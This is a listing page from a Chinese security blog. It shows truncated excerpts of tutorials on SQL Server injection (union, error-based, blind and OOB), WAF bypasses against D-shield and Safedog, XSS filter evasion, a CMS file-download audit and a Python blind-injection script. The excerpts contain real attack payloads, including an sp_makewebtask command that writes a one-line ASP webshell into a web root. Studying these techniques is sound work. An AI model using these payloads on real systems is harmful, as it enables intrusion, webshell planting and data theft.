自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(11)
  • 资源 (1)
  • 收藏
  • 关注

原创 超全的Sql server注入总结-请签收

SQL数据库注入总结入口目录:Sql server注入之库的介绍注入分类Sql server注入分类之语句总结Sql server注入分类之联合注入Sql server注入分类之报错注入Sql server注入分类之盲注(布尔-时间-OOB)Sql server注入分类之上马与组件扩展Sql server注入之注入绕过...

2020-12-17 16:35:39 278

原创 Sql server注入之注入绕过

本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾绕过特性前言我们经常利用一些数据库特性来进行WAF绕过。在MSSQL中,比如可以这样:浮点数形式:id=1.1union select科学计数法形式:id=1e0union select但其实还可以这样子:id=1.eunion select通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下M

2020-12-17 16:15:40 3705 1

原创 Sql server注入分类之上马与组件扩展

本章目录:Mssql上马1. 利用sp\_makewebtask写入一句话木马2. dbowner权限下写一句话组件扩展堆叠注入下的扩展运用Mssql上马1. 利用sp_makewebtask写入一句话木马1 . 修复上传;exec sp_makewebtask 'c:\inetpub\wwwroot\x.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''

2020-12-17 15:15:20 280

原创 Sql server注入分类之盲注(布尔-时间-OOB)

本章目录:布尔盲注第一步 判断注入第二步 猜解列数第三步 猜数据库名,表名:第四步 猜解字段第五步 判断字段长度第六步 猜解字段内容时间盲注利用条件注入语句OOB 注入利用条件原理检测利用/渗出布尔盲注总结:布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。第一步 判断注入and 1=1and 1=2第二步 猜解列数order by 1 #返回正确order by 2 #返回正确order by 3 #抛出错误第三步 猜数据

2020-12-16 22:20:13 2291

原创 Sql server注入分类之报错注入

本章目录:报错查询注入语句先统计总共有多少库第一步:获取库名第二步:获取表第三步:获取列名第四步:获取列数据扩展报错查询注入语句id=8’ //报错id=8 and 1=1 / and 1=2 //1=1 页面返回正常,1=2 页面返回不正常,证明我们的语句代入进去执行了,其实这种判断可以有很多拓展id=8 and exists(select * from sysobjects)//确实目标是否真的为mssql数据库,页面返回正常则是id=8and 1=CONVERT(i

2020-12-16 19:33:14 367

原创 Sql server注入分类之联合注入

本章目录:联合查询注入语句利用回显点权限判断查库:查表:查列名:查列内容:联合注入例:联合查询注入语句第一步 判断注入and 1=1and 1=2第二步 猜解列数(字段长度)order by 1 返回正确order by 2 返回正确order by 3 出现错误?id=-2union all select null,null,null,null--//在第四个的时候页面显示正常,说明字段为4?id=2and 1=(select is_srvrolemember(‘sysadm

2020-12-16 19:17:04 409

原创 Sql server注入分类之语句总结

关于mssql的注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据基础语句select ***://查询指令@@version // 数据库版本system_user //系统用户suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作user //获取当前数据库用户名db_name() // 当前数据库名 其中db_name(N)可以来遍历其他数据库

2020-12-16 17:14:21 3120 6

原创 Sql server注入之库的介绍

目录Mssql简介Mssql 服务、端口、后缀默认库的介绍字段的介绍数据库部分代码语句分析数据库的读写文件Mssql简介Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前,在2008及其以后的版本数据库的权限已经不再是system。为了迎合新的版本我以后文章的实验都在2008版本下面进行,同时也介绍以前可以利用的方法,相对于MySQL这个mssql显得重了许多,他众多的功能也给我们注入过程带

2020-12-14 21:45:24 236

原创 文件下载代码审计

下面我以Ear_Music_20180820_UTF8cms为例,进行对文件下载的代码审计。常见的下载或读取函数: file_get_contents()、readfile() 、fopen(),或者用seay源代码审计搜索down类似相关的词。一搜也发现这里的文件漏洞贼多,注入也很多。我先在页面找到下载的功能点:这样我们就能进行函数追踪,审视一下这代码了代码目录为\template\default\source\down.php当传入一个$file就直接读取这文件了,我们可以看到这个$fil

2020-05-31 23:52:40 343

原创 XSS绕过总结

有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效

2020-05-29 16:43:30 8945

原创 Python编写盲注自动化脚本

注入中盲注它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编写简单的 python脚本,来提高挖盲注的效率。说到盲注的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编写我也是用二分法的,下面我会用自己盲注数据库名字的例子来说明一下:#!/usr/bin/env python# coding:utf-8import requestsimport sysurl = "http://xxx.xxx.xxx.xxx/xxx/xxx

2020-05-14 01:09:23 1471

led音频谱.zip

里面有详细的音乐频谱显示源代码,能供你们参考,还有手工制作音频谱的电路图,里面复函了PCB的文件,方便制版。

2019-12-21

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除